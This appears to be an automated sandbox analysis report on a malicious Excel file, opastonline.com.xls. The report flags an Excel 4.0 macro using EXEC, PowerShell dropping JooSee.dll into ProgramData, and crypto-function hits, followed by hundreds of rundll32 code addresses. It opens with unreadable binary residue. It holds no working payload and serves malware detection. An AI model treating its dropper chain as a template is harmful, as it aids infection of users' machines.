"-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: opastonline.com.xls Initial sample: EXEC
Source: opastonline.com.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10036007 10_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10041050 10_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003130F 10_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100323E2 10_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030460 10_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10041592 10_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003E59F 10_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003960C 10_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100317E2 10_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10040B0E 10_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10031BB6 10_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10041C56 10_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10036CB5 10_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1001CD16 10_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10042D21 10_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10031FC2 10_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F8FD 10_2_0021F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021E991 10_2_0021E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021AB87 10_2_0021AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220001 10_2_00220001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219011 10_2_00219011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022907F 10_2_0022907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212051 10_2_00212051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230056 10_2_00230056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002170B3 10_2_002170B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002220BA 10_2_002220BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F09B 10_2_0021F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00224116 10_2_00224116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002181B7 10_2_002181B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002151BB 10_2_002151BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212251 10_2_00212251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022A2E8 10_2_0022A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B2C7 10_2_0021B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021E2CC 10_2_0021E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215361 10_2_00215361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214346 10_2_00214346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C3A0 10_2_0022C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002313AD 10_2_002313AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022D389 10_2_0022D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022E395 10_2_0022E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F435 10_2_0022F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022044F 10_2_0022044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002164E2 10_2_002164E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228519 10_2_00228519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215548 10_2_00215548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222550 10_2_00222550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021A55F 10_2_0021A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002295FA 10_2_002295FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021E5CF 10_2_0021E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C631 10_2_0022C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228606 10_2_00228606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022A666 10_2_0022A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002266CA 10_2_002266CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021D6D8 10_2_0021D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217735 10_2_00217735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022473C 10_2_0022473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219714 10_2_00219714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022176B 10_2_0022176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B74D 10_2_0021B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214816 10_2_00214816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221889 10_2_00221889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218969 10_2_00218969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022894B 10_2_0022894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002309B5 10_2_002309B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002159F2 10_2_002159F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AA30 10_2_0022AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00211A56 10_2_00211A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021EA99 10_2_0021EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BB23 10_2_0022BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218B3D 10_2_00218B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220B19 10_2_00220B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021BB7E 10_2_0021BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022CB5B 10_2_0022CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227BA6 10_2_00227BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219B83 10_2_00219B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00224B87 10_2_00224B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228BE3 10_2_00228BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022DBEA 10_2_0022DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229BCF 10_2_00229BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212BD9 10_2_00212BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217C37 10_2_00217C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AC3A 10_2_0022AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00213C3C 10_2_00213C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230C14 10_2_00230C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226C49 10_2_00226C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214C5D 10_2_00214C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022DCF7 10_2_0022DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00225CC4 10_2_00225CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00216D24 10_2_00216D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226DF8 10_2_00226DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219DCF 10_2_00219DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227DD5 10_2_00227DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BE27 10_2_0022BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230E3A 10_2_00230E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00213E3F 10_2_00213E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00215E60 10_2_00215E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AE6D 10_2_0022AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00220E53 10_2_00220E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021EE81 10_2_0021EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214EE3 10_2_00214EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229EEC 10_2_00229EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021AEFB 10_2_0021AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022DEDC 10_2_0022DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230F33 10_2_00230F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021CF47 10_2_0021CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021DFF3 10_2_0021DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217FF2 10_2_00217FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E9011 11_2_001E9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E3C3C 11_2_001E3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F044F 11_2_001F044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F20BA 11_2_001F20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001ED6D8 11_2_001ED6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EF8FD 11_2_001EF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F4116 11_2_001F4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002013AD 11_2_002013AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EAB87 11_2_001EAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F95FA 11_2_001F95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E7FF2 11_2_001E7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E59F2 11_2_001E59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E4816 11_2_001E4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F8606 11_2_001F8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00200E3A 11_2_00200E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F0001 11_2_001F0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E3E3F 11_2_001E3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FAC3A 11_2_001FAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E7C37 11_2_001E7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FF435 11_2_001FF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FC631 11_2_001FC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FAA30 11_2_001FAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00200C14 11_2_00200C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FBE27 11_2_001FBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E4C5D 11_2_001E4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E1A56 11_2_001E1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F0E53 11_2_001F0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E2051 11_2_001E2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E2251 11_2_001E2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F6C49 11_2_001F6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F907F 11_2_001F907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FAE6D 11_2_001FAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00200056 11_2_00200056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FA666 11_2_001FA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E5E60 11_2_001E5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EF09B 11_2_001EF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EEA99 11_2_001EEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F1889 11_2_001F1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EEE81 11_2_001EEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E70B3 11_2_001E70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FDEDC 11_2_001FDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EE2CC 11_2_001EE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F66CA 11_2_001F66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EB2C7 11_2_001EB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F5CC4 11_2_001F5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EAEFB 11_2_001EAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FDCF7 11_2_001FDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F9EEC 11_2_001F9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FA2E8 11_2_001FA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E64E2 11_2_001E64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E4EE3 11_2_001E4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F8519 11_2_001F8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F0B19 11_2_001F0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E9714 11_2_001E9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00200F33 11_2_00200F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F473C 11_2_001F473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E8B3D 11_2_001E8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E7735 11_2_001E7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E6D24 11_2_001E6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FBB23 11_2_001FBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EA55F 11_2_001EA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FCB5B 11_2_001FCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F2550 11_2_001F2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EB74D 11_2_001EB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F894B 11_2_001F894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E5548 11_2_001E5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E4346 11_2_001E4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001ECF47 11_2_001ECF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EBB7E 11_2_001EBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F176B 11_2_001F176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E8969 11_2_001E8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E5361 11_2_001E5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FE395 11_2_001FE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EE991 11_2_001EE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002009B5 11_2_002009B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FD389 11_2_001FD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F4B87 11_2_001F4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E9B83 11_2_001E9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E51BB 11_2_001E51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E81B7 11_2_001E81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F7BA6 11_2_001F7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FC3A0 11_2_001FC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E2BD9 11_2_001E2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F7DD5 11_2_001F7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F9BCF 11_2_001F9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001E9DCF 11_2_001E9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EE5CF 11_2_001EE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F6DF8 11_2_001F6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001EDFF3 11_2_001EDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001FDBEA 11_2_001FDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F8BE3 11_2_001F8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10036007 12_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10041050 12_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003130F 12_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100323E2 12_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10030460 12_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10041592 12_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003E59F 12_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003960C 12_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100317E2 12_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10040B0E 12_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10031BB6 12_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10041C56 12_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10036CB5 12_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001CD16 12_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10042D21 12_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10031FC2 12_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072F8FD 12_2_0072F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072E991 12_2_0072E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072AB87 12_2_0072AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073907F 12_2_0073907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740056 12_2_00740056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00722051 12_2_00722051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00729011 12_2_00729011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00730001 12_2_00730001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007270B3 12_2_007270B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007320BA 12_2_007320BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072F09B 12_2_0072F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00734116 12_2_00734116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007281B7 12_2_007281B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007251BB 12_2_007251BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00722251 12_2_00722251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073A2E8 12_2_0073A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072B2C7 12_2_0072B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072E2CC 12_2_0072E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725361 12_2_00725361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00724346 12_2_00724346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C3A0 12_2_0073C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007413AD 12_2_007413AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073E395 12_2_0073E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073D389 12_2_0073D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073044F 12_2_0073044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F435 12_2_0073F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007264E2 12_2_007264E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00732550 12_2_00732550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072A55F 12_2_0072A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725548 12_2_00725548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738519 12_2_00738519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007395FA 12_2_007395FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072E5CF 12_2_0072E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073A666 12_2_0073A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C631 12_2_0073C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738606 12_2_00738606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072D6D8 12_2_0072D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007366CA 12_2_007366CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073176B 12_2_0073176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072B74D 12_2_0072B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00727735 12_2_00727735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073473C 12_2_0073473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00729714 12_2_00729714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00724816 12_2_00724816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00731889 12_2_00731889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00728969 12_2_00728969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073894B 12_2_0073894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007259F2 12_2_007259F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007409B5 12_2_007409B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00721A56 12_2_00721A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AA30 12_2_0073AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072EA99 12_2_0072EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072BB7E 12_2_0072BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073CB5B 12_2_0073CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00728B3D 12_2_00728B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BB23 12_2_0073BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00730B19 12_2_00730B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00738BE3 12_2_00738BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073DBEA 12_2_0073DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00722BD9 12_2_00722BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00739BCF 12_2_00739BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00737BA6 12_2_00737BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00729B83 12_2_00729B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00734B87 12_2_00734B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00724C5D 12_2_00724C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736C49 12_2_00736C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00727C37 12_2_00727C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AC3A 12_2_0073AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00723C3C 12_2_00723C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740C14 12_2_00740C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073DCF7 12_2_0073DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00735CC4 12_2_00735CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00726D24 12_2_00726D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00736DF8 12_2_00736DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00737DD5 12_2_00737DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00729DCF 12_2_00729DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00725E60 12_2_00725E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073AE6D 12_2_0073AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00730E53 12_2_00730E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00723E3F 12_2_00723E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00740E3A 12_2_00740E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BE27 12_2_0073BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0072AEFB 12_2_0072AEFB
